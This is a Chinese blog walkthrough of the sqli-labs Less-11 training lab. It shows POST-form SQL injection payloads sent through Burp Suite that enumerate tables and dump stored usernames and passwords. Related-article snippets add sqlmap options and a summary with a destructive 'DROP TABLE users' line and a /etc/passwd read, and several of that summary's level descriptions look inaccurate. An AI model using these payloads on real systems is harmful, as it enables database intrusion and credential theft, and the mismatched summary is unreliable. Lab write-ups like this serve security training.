less-11的注入操作

最新推荐文章于 2025-03-04 20:51:06 发布
原创 最新推荐文章于 2025-03-04 20:51:06 发布 · 159 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#less

本文详细介绍了在火狐浏览器中使用Foxyproxy配置后的BurpSuite进行SQL注入攻击的过程。通过发送Repeater请求,发现基于单引号的字符型注入点,并逐步进行字段判断、表名和列名的查询,最终暴露了数据库中的用户名和密码。

在火狐浏览器下载foxyproxy 配置好之后 打开第十一个题目
在这里插入图片描述
在这里插入图片描述
在burpsuite 右击选择 send repeater 根据题目加一个’尝试一下
在这里插入图片描述
uname=admin’ and 1=1 --+&passwd=admin&submit=Submit
在这里插入图片描述uname=admin’ and 1=2 --+&passwd=admin&submit=Submit
and 1=2 --+恒为假是,执行错误,发现注入点是基于单引号的字符型注入
在这里插入图片描述
判断字段
uname=admin’ order by 3 --+&passwd=admin&submit=Submit
发现字段小于3
在这里插入图片描述
uname=admin’ order by 2 --+&passwd=admin&submit=Submit
发现字段数只有2
在这里插入图片描述
uname=admin &passwd= ’ union select 1,2 --+&submit=Submit
由于他只在uname和passwd表单中输出到屏幕上内容,uname闭合了,所以让passwd输出那个查询哪个语句
在这里插入图片描述
uname=admin’ &passwd=union select 1,group_concat(user(),@@datadir,database()) --+&submit=Submit
在这里插入图片描述
uname=admin’ &passwd=union select 1,group_concat( table_name) from information_schema.tables where table_schema=database() --+&submit=Submit
查询查出哪个库名下的所有的表名(security)
在这里插入图片描述
在这里插入图片描述
uname=admin’ &passwd=union select 1,group_concat( column_name) from information_schema.columns where table_name=“users” --+&submit=Submit爆表里面的字段
在这里插入图片描述
uname=admin’ &passwd=union select 1,group_concat( username,‘/’,password) from users --+&submit=Submit爆字段里面的数据
在这里插入图片描述

记录笔记
关注
【SQLi-LABS】Less -11 注入思路以及过程
m0_52513952的博客
02-22 3331
less 11 是 sqli-labs 的第一道 POST 型注入题,因此,我们不能再用之前 GET 型注入的方法,在搜索框进行注入,而是要在输入框里面完成注入。下面的注入流程是基于nliuc师傅的视频教程实现的。
POST注入通过sqli-labs靶场less-11
wanggonghanfei的博客
10-07 498
POST注入原理,并且通过POST注入通过sqli-labs靶场less-11
LESS2(sql注入
qq_44598397的博客
03-14 1010
Less2 源码 输入:http://127.0.0.1/sqlilabs/Less-2/?id=2’ 输出错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server v ersion for the right syntax to use near ‘’ LIM...
自动注入less全局变量
树欲静
12-15 1134
选项,可以用于为每个样式内容注入额外代码。请注意,如果注入的是实际的样式而不仅仅是变量时,那么这些样式将会在最终的打包产物中重复出现。指定传递给 CSS 预处理器的选项。文件扩展名用作选项的键。有的时候你想要向 webpack 的预处理器 loader 传递选项。要注意的是,在配置less文件路径时,要使用绝对路径,避免文件注入时路径错误。在vite项目中,通过配置vite-config文件。在vue-cli项目中自动注入less全局变量。这里也是要注意注入文件路径要为绝对路径。所有预处理器选项还支持。
less-11】基于SQLI的POST字符型SQL注入
未名编程
07-17 750
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 基于SQLI的POST字符型SQL注入 实验目的 通过本实验理解区别SQL注入中GET和POST的区别,掌握POST型SQL注入漏洞的手工注入方法,熟悉Burpsuite软件的使用。 实验环境 渗透平台:Kali 目标网站:SQLI平台上的Less-11 实验原理 1.POST方式概述 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。 2.GET和POST的区别: 语义上的区别,get用于.
SQLi LABS Less-12 联合注入+报错注入
wangyuxiang946的博客
06-21 1万+
sqli第十二关,sqli-labs less-12,sqlilabs less12
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 2000
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Less-1(sqlmap自动注入攻击)--sqli
XiaoYeZhu_1314的博客
01-28 950
表明有四种注入漏洞:boolean-based blind,error-based,time-based blind,UNION query。指定用于身份验证的cookie进行注入测试。打开火狐浏览器,进入sqli第一关的页面。尝试获取操作系统级别的shell访问权限。指定POST请求的数据进行注入测试。查看结果发现,可以访问到名字和密码。遇见[y/n]都直接回车跳过,得到。设置测试的深度级别(1-5)设置测试的风险级别(1-3)获取数据库管理系统的信息。获取数据库中表的信息。获取数据库表中的数据。
【靶场实操】sql-labs通关详解----第一节:基础注入方式(Less-1~Less-10)
goldfish8848的博客
08-01 1531
SQL-Labs是一个专注于SQL注入攻击的在线靶场,提供了从基础到高级的多个关卡,供学习者实践和挑战。
sqli-labs通关(less11-less22)
eee1122的博客
12-08 1916
post型注入在username中输入单引号,返回报错,根据报错内容可知username需单引号闭合发现登录成功username中输入1’ union select 1,2#有两列并且有回显。
SQLi-LABS的Less11-20分析
haoahaoahaoahao的博客
02-26 979
试试在username输入1或者1'或者1')或者1'))或者1"或者1")或者1"))那么password为空,发现输入1'或者1')或者1'))的时候会报错,那么通过Less12文章的order by命令发现输入1')的时候是能注入的,不过爆数据库uname=-1') union select 1,database()#&passwd=&submit=Submit的情况和Less12不一样,虽然登录成功却没显示。id=1'会怎么样呢,那么试一下看看发生什么。
Sqlilabs通关(Less11-Less20)
wcl20010的博客
05-11 669
这十关都是POST型,使用burpsuit或者使用火狐浏览器的插件hackbar。 hackbar链接:链接:https://pan.baidu.com/s/1bIP9lOBUtoH3_D5Apkmi2w 提取码:7odr 这里我的hackbar是破解版的。注意添加后禁止更新,当然可以去插件中间下载一个新版,平时使用它,不付费不能使用post等提交请求。但是我这破解版的,再提交表单后无法发现是post还是get。挺无语的。搭配使用吧。 less-11 基于错误的POST型单引号字符型注入 这就是我上
SQLI-LABS Less-11Less-12
Web学习之路
03-22 386
联合注入
SQLMap 使用参数详解
qq_37019068的博客
10-09 2万+
SQLMap 使用参数详解 SQLMap是一款自动化的SQL注入测试工具,在kali上已集成 如果不想使用kali的话,可以从github上直接拉取开源项目 git clone https://github.com/sqlmapproject/sqlmap.git 注:最新版的sqlmap应该是支持python3的,但是如果python3无法使用的话可以试试切换成python2执行 常见参数 -h 输出参数说明 -hh 输出详细的参数
submit 的4种写法
轻风细雨_林木木
04-06 2818
方法1: 方法2: 搜索 方法3: 其中最后一种比较灵活,比如说出发事件的可以不是一个按钮,而是一个超链接或者图片之类的元素。 提交 方法4: 输出图片
form表单提交方式
热门推荐
菜鸟一缕清风的博客
01-05 9万+
form表单提交方式总结一下: 一、直接上代码<script type="text/javascript"> function check(form) { if(form.userId.value=='') { alert("请输入用户帐号!"); form.userId.focus();
SUBMIT的几种情况...
人生路上漫悠悠,程序写春秋...
10-09 2295
SUBMIT的几种情况   1、最普通的用法*Code used to execute a reportSUBMIT Zreport.2、带select-options程序的Submit的用法*Code used to populate select-options & execute reportDATA:
Less-9~12,Less-16~17 攻略
最新发布
2301_78554096的博客
03-04 942
Less-9~12,Less-16~17 攻略
sqli-labs less-11-17
12-31
### 关于 sqli-labs 中 less-11less-17 的解决方案和解释 #### Less-11: 基本布尔盲注 SQL 注入漏洞 此级别展示了如何通过布尔条件来推断数据库中的数据。攻击者可以通过发送不同的查询并观察应用程序响应的变化来进行注入。 ```sql ?id=1' AND ASCII(SUBSTRING((SELECT database()),1,1))>90 -- ``` 上述语句尝试猜测当前使用的数据库名称的第一个字符的ASCII码值是否大于90[^1]。 #### Less-12: 时间延迟型盲注 SQL 注入漏洞 该实验利用时间函数 `SLEEP()` 或 `BENCHMARK()` 来判断服务器执行特定操作所需的时间,从而推测出某些信息。 ```sql ?id=1' AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1),1,1))>97,SLEEP(5),false) -- ``` 这段代码会根据指定条件下是否成立而使请求暂停几秒钟,以此作为反馈机制[^2]。 #### Less-13: 联合查询 (UNION) SQL 注入漏洞 联合查询允许将两个或多个 SELECT 结果组合在一起显示给用户。在这个例子中,可以用来获取额外的数据集。 ```sql ?id=-1 UNION ALL SELECT null,database(),null,null -- ``` 这里 `-1` 是为了确保原始查询返回零行记录,以便新添加的选择能够成功附加到最终输出上[^3]。 #### Less-14: 双重查询(堆叠查询)SQL 注入漏洞 当 Web 应用程序支持在同一 HTTP 请求内处理多条命令时,则可能存在这种类型的漏洞。这使得攻击者可以在一次提交里完成多项任务。 ```sql ?id=1; DROP TABLE users; ``` 注意,在实际环境中很少遇到这种情况,因为大多数现代框架都会阻止此类行为的发生[^4]。 #### Less-15: 错误消息泄露敏感信息 有时开发人员会在错误页面暴露过多细节,比如完整的 SQL 查询字符串甚至栈跟踪等内部实现情况。这些都可能帮助黑客构建更复杂的攻击模式。 ```sql ?id=' OR '1'='1 ``` 如果网站未正确配置异常处理器的话,可能会显示出整个 SQL 表达式的结构,进而让入侵者更容易找到突破口[^5]。 #### Less-16: 文件读取/写入权限滥用 一些情况下,Web 应用程序允许上传文件或将动态生成的内容保存至磁盘;然而如果没有严格验证输入参数就可能导致任意位置上的文档被篡改或者下载下来查看其内容。 ```sql ?file=/etc/passwd%00.jpg ``` 这里的技巧在于绕过 MIME 类型检测以及路径规范化逻辑,达到访问受限资源的目的[^6]。 #### Less-17: 存储过程调用与预编译语句绕过 存储过程中往往包含了大量业务逻辑,并且通常由高级程序员编写维护。但是假如它们也接收外部可控变量的话同样面临风险。此外,对于那些声称已经启用了防备措施的应用来说,仍然有可能存在旁路方法。 ```sql CALL sp_executesql(N'SELECT * FROM sysobjects') ``` 尽管许多平台默认不允许直接执行这样的指令,但在某些特殊场景下还是有机会成功的[^7]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值